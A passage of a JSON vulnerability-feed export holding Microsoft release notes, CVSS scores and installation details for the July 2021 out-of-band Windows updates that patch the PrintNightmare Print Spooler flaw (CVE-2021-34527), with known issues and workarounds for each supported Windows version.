downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004954>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004954](<https://download.microsoft.com/download/7/3/c/73cce342-34cc-4e96-9924-e42c5a19efe3/5004954.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004954 (Monthly Rollup) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004954", "href": "https://support.microsoft.com/en-us/help/5004954", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:43", "description": "None\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1607 update history home page. \n\n## Highlights\n\nThis security update includes key changes as follows:\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **&gt; **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5010359. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001402) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog ](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004948>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004948](<https://download.microsoft.com/download/4/a/8/4a80157a-c3e5-45b0-ab2d-9e6001b8ecd2/5004948.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 7, 2021\u2014KB5004948 (OS Build 14393.4470) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004948", "href": "https://support.microsoft.com/en-us/help/5004948", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:45", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>). \n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003697](<https://support.microsoft.com/help/5003697>) (released previous June 8, 2021) and addresses the following issues:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004956>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004956](<https://download.microsoft.com/download/e/f/5/ef50021e-60a9-47da-be60-b2687db452d3/5004956.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 7, 2021\u2014KB5004956 (Monthly Rollup) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004956", "href": "https://support.microsoft.com/en-us/help/5004956", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:08", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**5/11/21** \n**REMINDER **Windows 10, version 1909 reached end of service on May 11, 2021 for devices running the Home, Pro, Pro for Workstation, Nano Container, and Server SAC editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10We will continue to service the following editions: Enterprise, Education, and IoT Enterprise.\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1909 update history home page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. \n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update**Prerequisite:You must install the April 13, 2021 servicing stack update (SSU) (KB5001406) or the latest SSU (KB5003974) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004946>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004946](<https://download.microsoft.com/download/3/8/0/380275c2-0d42-4deb-a865-5059529c83f5/5004946.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004946 (OS Build 18363.1646) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004946", "href": "https://support.microsoft.com/en-us/help/5004946", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:44", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003667](<https://support.microsoft.com/help/5003667>) (released June 8, 2021) and addresses the following issues:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive the following error:\"Cannot connect to &lt;Server name&gt;, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \"Failure to configure Windows updates. Reverting Changes. Do not turn off your computer\", and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004953>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004953](<https://download.microsoft.com/download/2/6/c/26ceb7c6-ee36-40d8-bd9c-a0cea2d48fdd/5004953.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004953 (Monthly Rollup) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004953", "href": "https://support.microsoft.com/en-us/help/5004953", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:39", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**5/11/21 \nREMINDER **Windows 10, version 1809 reached end of service on May 11, 2021 for devices running the Enterprise, Education, and IoT Enterprise editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.We will continue to service the following editions: Enterprise G, HoloLens, and the LTSC editions for Client, Server, and IoT.\n\n**5/11/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in April 2021. In the May 11, 2021 release, we installed the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1809 update history [page](<https://support.microsoft.com/en-us/help/4464619>).\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing [KB4493509](<https://support.microsoft.com/en-us/help/4493509>), devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| \n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see [Manage the input and display language settings in Windows 10](<https://support.microsoft.com/en-us/help/4496404>).\n 2. Select **Check for Updates** and install the April 2019 Cumulative Update. For instructions, see Update Windows 10.\n**Note **If reinstalling the language pack does not mitigate the issue, reset your PC as follows:\n\n 1. Go to the **Settings **app &gt; **Recovery**.\n 2. Select **Get Started** under the **Reset this PC **recovery option.\n 3. Select **Keep my Files**.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **&gt; **Application**. If you see only event ID 